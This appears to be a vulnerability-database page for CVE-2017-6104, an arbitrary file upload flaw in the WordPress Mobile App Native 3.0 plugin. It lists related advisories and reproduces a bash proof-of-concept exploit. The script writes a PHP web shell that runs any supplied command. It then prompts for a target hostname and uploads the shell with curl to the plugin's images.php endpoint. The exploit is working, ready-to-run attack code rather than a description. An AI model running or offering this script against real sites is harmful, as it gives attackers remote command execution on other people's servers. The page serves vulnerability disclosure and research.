| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| WordPress Mobile App Native 3.0 Shell Upload Vulnerability | 2 Mar 201700:00 | – | zdt | |
| Wordpress Plugin Mobile App Native Remote File Upload Vulnerability | 3 Mar 201700:00 | – | cnvd | |
| CVE-2017-6104 | 2 Mar 201722:00 | – | cve | |
| CVE-2017-6104 | 2 Mar 201722:00 | – | cvelist | |
| Multiple WordPress Plugins - Arbitrary File Upload | 3 Mar 201700:00 | – | exploitdb | |
| WordPress Multiple Plugins - Arbitrary File Upload | 3 Mar 201700:00 | – | exploitpack | |
| CVE-2017-6104 | 2 Mar 201722:59 | – | nvd | |
| WordPress Mobile App Native 3.0 Shell Upload | 2 Mar 201700:00 | – | packetstorm | |
| WordPress Multiple Plugin File Upload | 17 Mar 201700:00 | – | packetstorm | |
| Design/Logic Flaw | 2 Mar 201722:59 | – | prion |
#!/bin/bash
#Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
#CVE-2017-6104
#Larry W. Cashdollar,@_larry0
#v1.0
cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
echo "<pre>";
\$cmd = (\$_REQUEST[‘cmd’]);
system(\$cmd);
echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-
red='\033[0;31m'
NC='\033[0m' # No Color
while [ true ]; do
echo -e ${red};
echo -e " Mobile App Native 3.0 File Upload PoC Redux $NC";
echo " 3/1/2017";
echo " Larry W. Cashdollar, @_larry0";
echo
echo " CVE-2017-6104";
echo "- Advisory -";
echo "http://www.vapid.dhs.org/advisory.php?v=178";
echo
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo "[+] Hostname $target";
echo "[+] Exploiting Plugin";
echo
RESULT=`curl -# -F '[email protected]' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
echo "[==========================================================================]"
echo $RESULT
echo "[==========================================================================]"
done
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation